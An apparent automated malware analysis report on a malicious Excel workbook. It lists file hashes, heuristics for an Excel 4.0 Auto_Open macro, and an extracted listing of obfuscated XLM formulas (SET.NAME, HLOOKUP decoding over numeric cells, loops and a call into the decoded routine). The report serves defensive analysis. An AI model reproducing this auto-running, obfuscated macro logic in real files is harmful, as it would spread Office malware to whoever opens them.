Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 425dd9395fd748d9…

MALICIOUS

Office (OLE)

Size: 35.5 KB
Created: 2020-11-27 11:45:01
Authoring application: Microsoft Excel
First seen: 2022-07-02
MD5: d68a4651413e68f2ec8761df99bf95f6
SHA-1: ad5014051ad31bebf9bcff08e6bbfefda5c5772b
SHA-256: 425dd9395fd748d9515e851036d87e42889abd9cc9f5f5f6a881b8bb53b38584
Risk Score: 140

Heuristics (3)

  • Excel 4.0 Auto_Open defined name (severity: critical, OLE_XLM_AUTOOPEN_DEFINEDNAME)
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs (severity: critical, OLE_XLM_DANGEROUS_FN)
    The Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present (severity: medium, OLE_XLM_AUTOOPEN)
    The workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename       | Kind      | Source                                                  | Size
xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing)  | 6617 bytes
SHA-256: 5d3b12200139bc5d57207a4706b96424033b7242f299691f5ca29cdebafb34d1
Script preview (first 1,000 lines of the extracted script):
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  ZgpZ
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!A160 
' 0018     27 LABEL : Cell Value, String Constant - bdYRiVHJFuyw len=0 
' 0018     27 LABEL : Cell Value, String Constant - cIxYIOBjMNjb len=0 
' 0018     24 LABEL : Cell Value, String Constant - FknPkRxKJ len=0 
' 0018     25 LABEL : Cell Value, String Constant - gCTCDadfkW len=0 
' 0018     22 LABEL : Cell Value, String Constant - hNyPNLp len=0 
' 0018     21 LABEL : Cell Value, String Constant - JRSndG len=0 
' 0018     22 LABEL : Cell Value, String Constant - kiFmGTZ len=0 
' 0018     26 LABEL : Cell Value, String Constant - ksJkVswPXZF len=0 
' 0018     22 LABEL : Cell Value, String Constant - oqMcpFU len=0 
' 0018     27 LABEL : Cell Value, String Constant - PIpZeSGMHNVG len=0 
' 0018     25 LABEL : Cell Value, String Constant - PsJjfgRWOL len=0 
' 0018     25 LABEL : Cell Value, String Constant - QXRXRqpGGI len=0 
' 0018     20 LABEL : Cell Value, String Constant - qyuhQ len=0 
' 0018     24 LABEL : Cell Value, String Constant - TMUGltGGy len=0 
' 0018     22 LABEL : Cell Value, String Constant - vGSOQtb len=0 
' 0018     25 LABEL : Cell Value, String Constant - vMcYdKpPON len=0 
' 0018     26 LABEL : Cell Value, String Constant - VqAhSdrvbsL len=0 
' 0018     21 LABEL : Cell Value, String Constant - XanBeN len=0 
' 0018     26 LABEL : Cell Value, String Constant - yMxLePRJouT len=0 
' 0018     20 LABEL : Cell Value, String Constant - zXLNH len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  ZgpZ,S43,"",-16.00000000000000000000
'  ZgpZ,S44,"",-161.00000000000000000000
'  ZgpZ,S45,"",541.00000000000000000000
'  ZgpZ,S46,"",-943.00000000000000000000
'  ZgpZ,S47,"",-201.00000000000000000000
'  ZgpZ,S48,"",-862.00000000000000000000
'  ZgpZ,A73,"SET.NAME("cIxYIOBjMNjb",0+VALUE("0"))",""
'  ZgpZ,A76,"SET.NAME("hNyPNLp",cIxYIOBjMNjb)",""
'  ZgpZ,A81,"SET.NAME("QXRXRqpGGI",cIxYIOBjMNjb)",""
'  ZgpZ,A83,"SET.NAME("JRSndG",COUNTA(TMUGltGGy))",""
'  ZgpZ,A85,"SET.NAME("vGSOQtb",COUNTA(yMxLePRJouT))",""
'  ZgpZ,A88,[],""
'  ZgpZ,A93,"SET.NAME("VqAhSdrvbsL","")",""
'  ZgpZ,A95,"hNyPNLp",""
'  ZgpZ,A100,"SET.NAME("PIpZeSGMHNVG",HLOOKUP("*",TMUGltGGy,hNyPNLp,FALSE))",""
'  ZgpZ,A105,"XanBeN",""
'  ZgpZ,A107,"SET.NAME("qyuhQ",cIxYIOBjMNjb)",""
'  ZgpZ,A112,[],""
'  ZgpZ,A116,"qyuhQ",""
'  ZgpZ,A118,"vMcYdKpPON",""
'  ZgpZ,A120,"bdYRiVHJFuyw",""
'  ZgpZ,A122,"zXLNH",""
'  ZgpZ,A124,"SET.NAME("oqMcpFU",VALUE(HLOOKUP("*",yMxLePRJouT,zXLNH,FALSE)))",""
'  ZgpZ,A127,"gCTCDadfkW",""
'  ZgpZ,A132,"VqAhSdrvbsL",""
'  ZgpZ,A135,"QXRXRqpGGI",""
'  ZgpZ,A140,NEXT(),""
'  ZgpZ,A144,"ksJkVswPXZF",""
'  ZgpZ,A148,[],""
'  ZgpZ,A151,"kiFmGTZ",""
'  ZgpZ,A154,NEXT(),""
'  ZgpZ,A158,RETURN(),""
'  ZgpZ,A186,"SET.NAME("PsJjfgRWOL",A73)",""
'  ZgpZ,A188,"TMUGltGGy",""
'  ZgpZ,A193,"SET.NAME("yMxLePRJouT",R40C15)",""
'  ZgpZ,A198,"SET.NAME("kiFmGTZ",206)",""
'  ZgpZ,A203,"SET.NAME("FknPkRxKJ",1)",""
'  ZgpZ,A205,PsJjfgRWOL(),""
'  ZgpZ,A206,HALT(),""